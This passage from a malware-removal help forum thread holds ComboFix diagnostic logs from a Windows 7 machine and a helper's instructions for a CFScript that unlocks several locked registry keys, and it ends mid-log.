@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0004\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0005\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0006\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
Completion time: 2014-03-11 14:48:18
ComboFix-quarantined-files.txt 2014-03-11 03:48
ComboFix2.txt 2014-03-11 02:35
ComboFix3.txt 2014-03-11 02:07
.
Pre-Run: 36,797,087,744 bytes free
Post-Run: 36,727,373,824 bytes free
.
- - End Of File - - 347AD25622ED86437AA5DB38C81462D3
A36C5E4F47E84449FF07ED3517B43A31
Click to expand...

Is there a continuing problem, for I cannot find those locked registry keys...

ta very muchly.
 
What do you mean by scripts are following you?

1. Go to Start > Run > type Notepad.exe and click OK to open Notepad.
It must be Notepad, not Wordpad.
2. Copy the text in the below code box

Code: 
Reglock::

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0004\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0005\AllUserSettings]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0006\AllUserSettings]


3. Go to the Notepad window and click Edit > Paste
4. Then click File > Save
5. Name the file CFScript.txt - Save the file to your Desktop
6. Then drag the CFScript (hold the left mouse button while dragging the file) and drop it (release the left mouse button) into ComboFix.exe as you see in the screenshot below. Important: Perform this instruction carefully!


CFScript-1.gif


ComboFix will begin to execute, just follow the prompts.
After reboot (in case it asks to reboot), it will produce a log for you.
Post that log (Combofix.txt) in your next reply.
 
have run CFScript.txt

Hi Johnb35,

many thanks for your guidance here.

I have run CFScript.txt as advised by you above.
Here is the log from that run:

ComboFix 14-03-10.01 - Chris 12/03/2014 8:18.4.2 - x86
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.61.1033.18.3070.1984 [GMT 11:00]
Running from: c:\users\Chris\Downloads\1-secure\ComboFix.exe
Command switches used :: c:\users\Chris\Downloads\1-secure\CFScript.txt
AV: Symantec Endpoint Protection *Disabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
FW: Symantec Endpoint Protection *Disabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
SP: Symantec Endpoint Protection *Disabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-02-11 to 2014-03-11 )))))))))))))))))))))))))))))))
.
.
2014-03-11 21:26 . 2014-03-11 21:26 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp
2014-03-11 21:26 . 2014-03-11 21:26 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-11 01:59 . 2014-03-11 21:26 -------- d-----w- c:\users\Chris\AppData\Local\temp
2014-03-11 00:06 . 2014-03-11 00:20 -------- d-----w- c:\program files\WhatsRunning
2014-03-10 23:51 . 2014-03-10 23:51 -------- d--h--w- c:\windows\PIF
2014-03-10 22:57 . 2014-03-10 23:04 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-03-10 22:56 . 2014-03-10 22:56 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\users\Chris\AppData\Roaming\Malwarebytes
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2014-03-10 22:38 . 2014-03-10 22:38 -------- d-----w- c:\programdata\Malwarebytes
2014-03-10 22:38 . 2013-04-04 03:50 22856 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-03-09 09:27 . 2014-03-09 09:27 -------- d-----w- c:\users\Chris\AppData\Local\Symantec
2014-03-09 09:12 . 2014-03-09 09:28 -------- d-----w- c:\program files\Common Files\Symantec Shared
2014-03-09 09:12 . 2014-03-09 09:12 142936 ----a-w- c:\windows\system32\drivers\SYMEVENT.SYS
2014-03-09 09:10 . 2014-03-09 09:10 420752 ----a-w- c:\windows\system32\SymVPN.dll
2014-03-09 09:10 . 2014-03-09 09:10 33264 ----a-w- c:\windows\system32\drivers\WGX.SYS
2014-03-09 09:10 . 2014-03-09 09:10 136080 ----a-w- c:\windows\system32\FwsVpn.dll
2014-03-09 09:10 . 2014-03-09 09:10 361360 ----a-w- c:\windows\system32\sysfer.dll
2014-03-09 09:10 . 2014-03-09 09:10 126440 ----a-w- c:\windows\system32\drivers\SysPlant.sys
2014-03-09 09:10 . 2014-03-09 09:10 11152 ----a-w- c:\windows\system32\sysferThunk.dll
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\programdata\regid.1992-12.com.symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\windows\system32\drivers\SEP
2014-03-09 09:10 . 2014-03-11 21:05 -------- d-----w- c:\programdata\Symantec
2014-03-09 09:10 . 2014-03-09 09:10 -------- d-----w- c:\program files\Symantec
2014-02-20 20:29 . 2014-02-20 20:31 -------- d-----w- c:\programdata\WinZip
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-11 20:56 . 2012-03-29 19:34 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-03-11 20:56 . 2011-05-17 23:08 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-03-11 20:31 . 2010-02-13 22:24 16608 ----a-w- c:\windows\gdrv.sys
2014-01-19 02:39 . 2014-01-19 02:39 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-01-19 02:39 . 2014-01-19 02:39 645120 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-19 02:39 . 2014-01-19 02:39 194048 ----a-w- c:\windows\system32\elshyph.dll
2014-01-19 02:39 . 2014-01-19 02:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-19 02:39 . 2014-01-19 02:39 62464 ----a-w- c:\windows\system32\tdc.ocx
2014-01-19 02:39 . 2014-01-19 02:39 34816 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-19 02:39 . 2014-01-19 02:39 337408 ----a-w- c:\windows\system32\html.iec
2014-01-19 02:39 . 2014-01-19 02:39 182272 ----a-w- c:\windows\system32\msls31.dll
2014-01-19 02:39 . 2014-01-19 02:39 1818112 ----a-w- c:\windows\system32\wininet.dll
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-01-19 02:39 . 2014-01-19 02:39 1051136 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-19 02:39 . 2014-01-19 02:39 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-01-19 02:39 . 2014-01-19 02:39 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-01-19 02:39 . 2014-01-19 02:39 24576 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-19 02:39 . 2014-01-19 02:39 1926656 ----a-w- c:\windows\system32\inetcpl.cpl
2014-01-19 02:39 . 2014-01-19 02:39 151552 ----a-w- c:\windows\system32\iexpress.exe
2014-01-19 02:39 . 2014-01-19 02:39 139264 ----a-w- c:\windows\system32\wextract.exe
2014-01-19 02:39 . 2014-01-19 02:39 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-01-19 02:39 . 2014-01-19 02:39 86016 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-19 02:39 . 2014-01-19 02:39 74240 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-19 02:39 . 2014-01-19 02:39 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-19 02:39 . 2014-01-19 02:39 553472 ----a-w- c:\windows\system32\jscript9diag.dll
2014-01-19 02:39 . 2014-01-19 02:39 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-01-19 02:39 . 2014-01-19 02:39 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-19 02:39 . 2014-01-19 02:39 4240384 ----a-w- c:\windows\system32\jscript9.dll
2014-01-19 02:39 . 2014-01-19 02:39 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-01-19 02:39 . 2014-01-19 02:39 36352 ----a-w- c:\windows\system32\imgutil.dll
2014-01-19 02:39 . 2014-01-19 02:39 13312 ----a-w- c:\windows\system32\mshta.exe
2014-01-19 02:39 . 2014-01-19 02:39 111616 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-19 02:39 . 2014-01-19 02:39 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-01-19 02:39 . 2014-01-19 02:39 69632 ----a-w- c:\windows\system32\smss.exe
2014-01-19 02:39 . 2014-01-19 02:39 640512 ----a-w- c:\windows\system32\advapi32.dll
2014-01-19 02:39 . 2014-01-19 02:39 619520 ----a-w- c:\windows\system32\tdh.dll
2014-01-19 02:39 . 2014-01-19 02:39 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-01-19 02:39 . 2014-01-19 02:39 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-01-19 02:39 . 2014-01-19 02:39 38912 ----a-w- c:\windows\system32\csrsrv.dll
2014-01-19 02:39 . 2014-01-19 02:39 1289096 ----a-w- c:\windows\system32\ntdll.dll
2014-01-19 02:39 . 2014-01-19 02:39 338944 ----a-w- c:\windows\system32\drivers\afd.sys
2014-01-19 02:39 . 2014-01-19 02:39 240496 ----a-w- c:\windows\system32\drivers\netio.sys
2014-01-19 02:39 . 2014-01-19 02:39 231424 ----a-w- c:\windows\system32\mswsock.dll
2014-01-19 02:39 . 2014-01-19 02:39 187752 ----a-w- c:\windows\system32\drivers\FWPKCLNT.SYS
2014-01-19 02:39 . 2014-01-19 02:39 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-01-19 02:38 . 2014-01-19 02:38 49152 ----a-w- c:\windows\system32\taskhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 6144 ---ha-w- c:\windows\system32\api-ms-win-security-base-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 5120 ---ha-w- c:\windows\system32\api-ms-win-core-file-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4608 ---ha-w- c:\windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-synch-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-misc-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 4096 ---ha-w- c:\windows\system32\api-ms-win-core-localization-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-memory-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3584 ---ha-w- c:\windows\system32\api-ms-win-core-heap-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-util-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-string-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-profile-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-io-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-handle-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-debug-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 3072 ---ha-w- c:\windows\system32\api-ms-win-core-console-l1-1-0.dll
2014-01-19 02:38 . 2014-01-19 02:38 293376 ----a-w- c:\windows\system32\KernelBase.dll
2014-01-19 02:38 . 2014-01-19 02:38 271360 ----a-w- c:\windows\system32\conhost.exe
2014-01-19 02:38 . 2014-01-19 02:38 169984 ----a-w- c:\windows\system32\winsrv.dll
2014-01-19 02:37 . 2014-01-19 02:37 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 906240 ----a-w- c:\windows\system32\FntCache.dll
2014-01-19 02:37 . 2014-01-19 02:37 604160 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-01-19 02:37 . 2014-01-19 02:37 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 364544 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-19 02:37 . 2014-01-19 02:37 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 293376 ----a-w- c:\windows\system32\dxgi.dll
2014-01-19 02:37 . 2014-01-19 02:37 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-19 02:37 . 2014-01-19 02:37 249856 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-19 02:37 . 2014-01-19 02:37 2284544 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-19 02:37 . 2014-01-19 02:37 220160 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-19 02:37 . 2014-01-19 02:37 207872 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-19 02:37 . 2014-01-19 02:37 1988096 ----a-w- c:\windows\system32\d3d10warp.dll
2014-01-19 02:37 . 2014-01-19 02:37 187392 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-19 02:37 . 2014-01-19 02:37 161792 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-19 02:37 . 2014-01-19 02:37 1247744 ----a-w- c:\windows\system32\DWrite.dll
2014-01-19 02:37 . 2014-01-19 02:37 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2010-03-17 8546848]
"snpstd"="c:\windows\vsnpstd.exe" [2003-12-30 40960]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2011-11-01 59240]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"LWS"="c:\program files\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2012-09-07 296096]
"Dell V310-V510 Series Fax Server"="c:\program files\Dell V310-V510 Series\fm3032.exe" [2009-12-30 311296]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2013-07-01 254336]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Adobe Gamma Loader.lnk - c:\program files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe [2010-2-14 113664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"mixer7"=wdmaud.drv
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Flowkeeper.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Flowkeeper.lnk
backup=c:\windows\pss\Flowkeeper.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\hpoddt01.exe.lnk
backup=c:\windows\pss\hpoddt01.exe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
2012-07-01 12:20 116648 ----atw- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Logitech Vid HD]
2010-05-11 06:43 6061400 ----a-w- c:\program files\Logitech\Vid\Vid.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2012-09-07 02:30 296096 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001
.
R2 dleaCATSCustConnectService;dleaCATSCustConnectService;c:\windows\system32\spool\DRIVERS\W32X86\3\\dleaserv.exe [2009-07-01 98984]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [2013-04-04 701512]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-09-04 171680]
R2 WCMVCAM;WebcamMax, WDM Video Capture;c:\windows\system32\DRIVERS\wcmvcam.sys [2011-06-23 1068216]
R3 ewusbnet;HUAWEI USB-NDIS miniport;c:\windows\system32\DRIVERS\ewusbnet.sys [2009-10-21 198656]
R3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\DRIVERS\ewusbdev.sys [2009-10-12 101120]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-01-19 108032]
R3 PACSPTISVR-Sound_Organizer;PACSPTISVR-Sound_Organizer;c:\program files\Sony\Sound Organizer\Sony.Earth\PACSPTISVR.exe [2012-11-07 174176]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2010-11-20 15872]
R3 SyDvCtrl;SyDvCtrl;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\SyDvCtrl32.sys [2013-10-21 28576]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-09-01 1343400]
S0 SymDS;Symantec Data Store;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMDS.SYS [2013-10-21 367704]
S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMEFA.SYS [2013-10-21 935512]
S1 BHDrvx86;BHDrvx86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\BASHDefs\20140304.011\BHDrvx86.sys [2014-03-03 1098968]
S1 ccSettings_{974A0163-23BB-4C9D-A3C2-611667F7A450};Symantec Endpoint Protection 12.1.4013.4013.105 Settings Manager;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\ccSetx86.sys [2013-10-21 134744]
S1 IDSVix86;IDSVix86;c:\programdata\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Data\Definitions\IPSDefs\20140309.011\IDSvix86.sys [2014-03-07 394456]
S1 SymIRON;Symantec Iron Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\Ironx86.SYS [2013-10-21 175192]
S1 SYMNETS;Symantec Network Security WFP Driver;c:\windows\system32\Drivers\SEP\0C010FAD\0FAD.105\x86\SYMNETS.SYS [2013-10-21 341080]
S2 dlea_device;dlea_device;c:\windows\system32\dleacoms.exe [2009-07-01 602792]
S2 DragonSvc;Dragon Service;c:\program files\Common Files\Nuance\dgnsvc.exe [2012-07-18 310232]
S2 GEST Service;GEST Service for program management.;c:\program files\GIGABYTE\EnergySaver\GSvr.exe [2008-09-24 68136]
S2 MBAMScheduler;MBAMScheduler;c:\program files\Malwarebytes' Anti-Malware\mbamscheduler.exe [2013-04-04 418376]
S2 SepMasterService;Symantec Endpoint Protection;c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe [2013-10-21 144368]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2012-12-28 383416]
S2 UMVPFSrv;UMVPFSrv;c:\program files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [2012-01-18 450848]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-02-17 108120]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-04-04 22856]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2009-07-13 139776]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-29 20:56]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000Core.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000UA.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 10.1.1.1
TCP: Interfaces\{9E575FD1-707C-49A4-AB7B-3B52A7908E9D}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{A8669315-9D96-4AC1-8C0E-A8D09B1F0C75}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D42CB96A-3720-412A-B8B3-1D254475ABC4}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D87D39B8-7A27-4D89-A4A0-DA761B812D05}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2364279-D312-4EF1-AE1C-683CB479397F}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2A95CE3-6580-4E6C-BA15-81E9DDF11D1B}: NameServer = 198.142.0.51 61.88.88.88
FF - ProfilePath - c:\users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\sclbjaf5.default\
FF - prefs.js: browser.startup.homepage - about:newtab
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SepMasterService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe\" /s \"Symantec Endpoint Protection\" /m \"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\sms.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SmcService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\Smc.exe\" /prefetch:1"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:61,9a,4c,64,7b,f9,ce,01
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ ]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ \OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.*5mõ ]
"0"=hex:47,3a,5c,55,74,69,6c,69,74,69,65,73,5c,4d,79,20,4d,75,73,69,63,5c,4d,
